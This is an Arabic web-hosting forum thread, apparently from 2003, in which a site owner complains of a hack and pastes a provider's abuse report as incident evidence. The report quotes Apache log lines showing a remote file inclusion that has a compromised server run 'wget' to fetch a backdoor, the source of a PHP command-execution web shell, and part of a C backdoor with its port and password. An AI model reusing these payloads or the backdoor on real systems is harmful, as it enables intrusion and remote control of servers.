موقع http://www.saudi4host.net اخترق
موقع http://www.saudi4host.net اخترق
فرحان ياسلوقي
على تراب انت واكس سيرفر
اعلى مابخليكم ركبوه
وسلم لي على الباك اب
وقت ماتخترقوه دقوا علي جوال
أشكي همي إلى من ......... !!!!!!
قسماً بالله شي يضيق الصدر من جد
قال أيش قال مسلمين ، عرب !!!!!!
لا حول ولا قوة إلا بالله العلي العظيم
saudi4host
أذكر الله وهدي أعصابك
ولا يستفزونك
أعذرك والله لكن نقول الحمد لله قدر الله وما شاء فعل
والحمد لله إنك مهتم بالباك آب
لاتخاف اخوي فهد
انا عندي باك اب
يومي
اسبوعي
شهري
باك اب عند الشركة عند الشركة على سي دي
او له اسم ثاني
ذاتبن
===================
الروت والله لو تموت ماتقرب له
ويابا ملفات الس بلس اللي منزلها على السيرفر ماني قايل لك
وش تسوي بها
كشفوها فاست سيرفر وهذاي نص رسالتهم لي
============================
Greetings,
We recently received the following report of illicit activity on your
server (see message pasted below). Please immediately terminiate the
offenders on your server, as our AUP clearly does not allow this sort of
activity.
We have logged into the server and chown'd and chmodd'd the specified
files (/home/music/public_html/cgi-bin).
-------------
Regards,
Technical Support Staff
PowerSurgeR Technologies, Inc. -- Technical Department
Phone: 800.867.5055 -- FAX: 319-236-6552
1025 Technology Parkway, Suite A
Cedar Falls, IA 50613
E-Mail: tech@powersurge.net
Web: http://www.powersurge.net/support/
BE198
------------------------------------------------------------------------
-------------
This came into our ticket system.
The IP is one of yours when we look it up in billing.
Alex Broque
Hurricane Electric
Fremont, CA USA
---------- Forwarded message ----------
Date: Wed, 2 Apr 2003 12:49:12 -0800
From: support@he.net, John Cooper
To: broquea@he.net
Subject: [#119267] hacks
Heres the link on your server:
http://64.62.172.18/~music/cgi-bin/ovas0n.=
c
HOW THEY GOT IN : taken from apache logs
212.138.47.11 - - [02/Apr/2003:10:12:02 -0500] "GET
/images/banners/wahl_banner.gif HTTP/1.0" 200 13834
"http://www.luckyscafe.com/index.php?file=3Dhttp://tech4arab.com/shell"
"Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
212.138.47.12 - - [02/Apr/2003:10:13:56 -0500] "GET
/images/banners/gsi_banner.gif HTTP/1.0" 200 13018
"http://www.luckyscafe.com/index.php?file=3Dhttp://tech4arab.com/shell?w
ork_d=
i
r=3D/&command=3Dwget+-P/tmp+http://64.62.172.18/~music/cgi-bin/ovas0n.c"
"Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
THE SCRIPTS THEY USED AND THE TROJAN PLANT:
/*
**************************************************************
* PHP Shell *
**************************************************************
$Id: phpshell.php,v 1.13 2001/12/10 19:47:54 gimpster Exp $
An interactive PHP-page that will execute any command entered.
See the files README and INSTALL or http://www.gimpster.com for
further information.
Copyright (C) 2000 Martin Geisler
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
=20
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
=20
You can get a copy of the GNU General Public License from this
address: http://www.gnu.org/copyleft/gpl.html#SEC1
You can also write to the Free Software Foundation, Inc., 59 Temple
Place - Suite 330, Boston, MA 02111-1307, USA.
=20
*/
?>
PHP Shell
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
if ($regs[1][0] =3D=3D '/') {
$new_dir =3D $regs[1];
} else {
$new_dir =3D $work_dir . '/' . $regs[1];
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir =3D $new_dir;
}
unset($command);
}
}
}
/* we chdir to that dir. */
if (file_exists($work_dir) && is_dir($work_dir)) {
chdir($work_dir);
$work_dir =3D exec("pwd");
} else {
/* No work_dir - we chdir to $DOCUMENT_ROOT */
chdir($DOCUMENT_ROOT);
$work_dir =3D $DOCUMENT_ROOT;
}
?>
" method=3D"post">
Current working directory:
$work_dir_splitted =3D explode("/", substr($work_dir, 1));
echo "urlencode($command) . "\">Root/";
if ($work_dir_splitted[0] =3D=3D "") {
$work_dir =3D "/"; /* Root directory. */
} else {
for ($i =3D 0; $i < count($work_dir_splitted); $i++) {
/* echo "i =3D $i";*/
$url .=3D "/".$work_dir_splitted[$i];
echo "urlencode($command) . "\">$work_dir_splitted[$i]/";
}
}
?>
Choose new working directory:
Command:
Enable stderr-trapping? name=3D"stderr">
Output:
Copyright C 2000,
href=3D"mailto:gimpster@gimpster.com">Martin Geisler. Get the latest
version at Arab VieruZ.
/* xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx */
/* P R I V A T E */
/********************************************************/
/* Opens a password protected backd00r and lets you */
/* execute commands, and then hides in the background */
/* I would like to thank SyF for gs.c */
/* coded by misteri0 //UnlG */
/********************************************************/
/* P R I V A T E */
/* xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx */
#include
#include
#include
#include
#include
#include
#include
#include
#define PASSAUTH 1 /* undefine this is you won't want a password at the
beginning */
#define PORT 29369
#define MSG_WELCOME "unlg's backd00r, enter whatever is necessary\n All
commands are followed by a ;\n"
#define MSG_PASSWORD "Password: "
#define MSG_WRONGPASS "Invalid password\n"
#define MSG_OK "Welcome...\n"
#define MSG_CONTINUE "Do you want to continue?\n"
#define HIDE "-bash"
#define SHELL "/bin/sh"
#ifdef PASSAUTH
#define PASSWD "app910h"
#endif
int main (int argc, char *argv[]);
#ifdef PASSAUTH
int login (int);
#endif
23703 (ovas0n)
=20
=20
=20
------------------------------------------------------------------------
---=
-
----
23704 (ovas0n) /tmp/ovas0n /home/luckys/public_htm=
l
-bash vas0n
=20
=20
WHOIS LOOKUP OF THE IP THE ATTACK CAME FROM:
% This is the RIPE Whois server.
% The objects are in RPSL format.
Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-serv...copyright.html
inetnum: 212.138.47.0 - 212.138.47.255
netname: ISU-5
descr: Internet Service Unit ISU
country: SA
admin-c: KR6046-RIPE
tech-c: KR6046-RIPE
status: ASSIGNED PA
mnt-by: KACST-ISU-MNT
mnt-lower: KACST-ISU-MNT
route: 212.138.0.0/16
role: KACST ROLE
address: Saudi Network Information Center, ISU
address: King Abdulaziz City for Science and Technology,
address: P.O.Box 6086, Riyadh 11442, Saudi Arabia.
phone: +9661 481 3932
fax-no: +9661 481 3254
e-mail: ipreg@saudinic.net.sa
trouble: abuse@isu.net.sa
admin-c: ZOM1-RIPE
tech-c: RA705-RIPE
tech-c: ANAS1-RIPE
nic-hdl: KR6046-RIPE
remarks: This Role object is for handling and maintaining all
remarks: IP Blocks registered by SaudiNIC(LIR) in Saudi Arabia.
mnt-by: KACST-ISU-MNT
changed: ipreg@saudinic.net.sa 20010701
انا حررت الرد واتمنى ما نشوف الشتايم وهالكلام مرة ثانيه اخوي .. مقدر شعورك و موقفك عى الي صار بموقعك والله يعينك لكن مو معناه نشوف شتم بهالطريقه .. تحياتي لك
Net Hunter